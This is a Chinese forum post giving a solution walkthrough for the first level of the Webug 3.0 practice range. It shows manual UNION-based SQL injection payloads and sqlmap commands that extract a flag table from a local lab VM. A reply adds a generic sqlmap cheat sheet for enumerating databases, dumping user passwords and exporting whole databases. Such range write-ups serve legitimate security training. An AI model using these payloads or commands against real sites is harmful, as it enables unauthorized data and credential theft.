安全资源-盼盼资源网-亲测资源网-盼盼的家园www.panpan.org

 找回密码
 立即注册
查看: 176|回复: 1

[普通] webug3.0第一关靶场答案-很简单的一个注入-普通的GET注入

[复制链接]

1976

主题

2056

帖子

40万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
406988
发表于 2019-10-5 00:08:23 | 显示全部楼层 |阅读模式
webug3.0第一关靶场答案-很简单的一个注入-普通的GET注入

Webug下载与安装:
首先在Webug3.0官网 下载虚拟机
在本地进行解压,解压后为Win2003 VM虚拟机镜像。
虚拟机密码为***123456***,崩溃后可以直接将快照恢复到***gh0st***即可。
在kali下可以使用 ***Vmware Linux***版打开,Windonws 下可以使用 ***Vmware Windows***版打开,Mac下可以使用 ***Vmware Fusion***打开。
在虚拟机命令窗口敲入ipconfig即可获得虚拟机IP地址,默认端口80。
题目源文件存在于网站根目录:***C:\phpStudy\WWW*** 而不是桌面上的***Webug***目录里的文件,这两个目录里文件不同。

渗透基础解题过程:
————————————————
第一题:-很简单的一个注入-普通的GET注入
题目类型:SQL注入
使用工具:
OWASP Mantra点击打开链接(hackbar)
或者
sqlmap

首先看OWASP Mantra点击打开链接(hackbar)的手工注入过程:

1、在“id=1”后面键入单引号
http://192.168.124.128/pentest/test/sqli/sqltamp.php
?gid=1'
根据错误信息判断此参数存在注入点并可判断出后台数据库为MySQL,错误信息如下:



2、为了进行Union查询首先需要使用“order by”关键字判断字段数,判断过程中可以使用二分。
http://192.168.124.128/pentest/test/sqli/sqltamp.php
?gid=1'order by 4 -- '



http://192.168.124.128/pentest/test/sqli/sqltamp.php
?gid=1'order by 5 -- '



3、通过上述判断有四个字段,接下来通过database()函数确定当前表所在的数据库。



4、确定当前数据库名称后,查看当前数据库存在那些表。
http://192.168.124.128/pentest/test/sqli/sqltamp.php
?gid=1'union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema='pentesterlab' -- '



5、通过上述查询发现当前数据库下存在flag表,接下来查看flag表中有那些字段。
http://192.168.124.128/pentest/test/sqli/sqltamp.php
?gid=1'union select group_concat(column_name),2,3,4 from information_schema.columns where table_name='flag' -- '



6、通过查看发现flag表中存在id,flag两个字段,接下来查看字段值。
http://192.168.124.128/pentest/test/sqli/sqltamp.php
?gid=1'union select flag,2,3,4 from flag -- '



7、最终得到flag(如上图所示)


###使用sqlmap进行注入过程如下:


1、首先在终端敲入以下命令获取当前数据库名称:
sqlmap -u http://192.168.124.128/pentest/test/sqli/sqltamp.php?gid=1 -p gid --current-db



2、其次在终端敲入以下命令获取当前数据库中表格:
sqlmap -u http://192.168.124.128/pentest/test/sqli/sqltamp.php?gid=1 -p gid -D pentesterlab --tables



3、最终在终端桥如一下命令获得flag表单中的信息:
sqlmap -u http://192.168.124.128/pentest/test/sqli/sqltamp.php?gid=1 -p gid -D pentesterlab -T flag --dump







本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

1976

主题

2056

帖子

40万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
406988
 楼主| 发表于 2019-10-5 00:20:03 | 显示全部楼层
sqlmap使用方法:

mssql access 直接爆表.然后你懂的
BT5里面的话前面就要加python
sqlmap.py -u url --dbs //爆数据库
sqlmap.py -u url --current-db //爆当前库
sqlmap.py -u url --current-user //爆当前用户
sqlmap.py -u url --users   查看用户权限
sqlmap.py -u url --tables -D 数据库 //爆表段
sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段

翻回来也可以

sqlmap.py -u url  判断
sqlmap.py -u url --is-dba -v   这是判断当前数据库的使用者是否是dba
sqlmap.py -u url --users -v 0  这句的目的是列举数据库的用户
sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码
sqlmap.py -u url --privileges -v 0 这是判断当前的权限
sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
sqlmap.py -u url --tables -D '表' 爆表
sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列
sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
sqlmap.py -u url --dump -all -v 0


这儿我们将所有的库导出来,我想这就是前段时间盛传的脱裤吧,在执行这项操作的时候,会把所有的表里的内容导入到当前的一个目录下,看着清楚明了,但是花费的时间和很长。
sqlmap -u "http://www.xxxxx.com/newsphp?class=news&id=5&page=1&catalog_id=2" --users --password 爆用户密码


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|民间故事|新华字典|周公解梦|实用工具|加密解密|便民服务|盼盼工具箱|闹钟|默笙工具箱|易经风水|Archiver|手机版|小黑屋|安全资源-盼盼资源网